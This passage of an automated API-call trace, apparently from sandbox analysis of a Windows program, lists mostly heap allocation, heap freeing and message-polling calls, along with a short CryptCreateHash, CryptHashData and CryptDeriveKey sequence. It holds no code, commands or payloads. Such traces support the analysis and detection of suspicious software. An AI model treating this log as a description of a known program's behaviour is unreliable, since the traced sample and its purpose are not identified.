hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0264.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.142] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.142] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.143] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.143] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.143] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.143] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.143] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.143] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.143] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.143] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.143] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.143] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.144] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0264.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.144] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.144] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.144] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.144] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.144] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.144] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.145] CryptHashData (hHash=0xaa5860, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.145] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.145] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.145] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.145] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.145] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.145] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.145] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.145] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.145] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.145] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.146] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.150] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0264.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0264.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 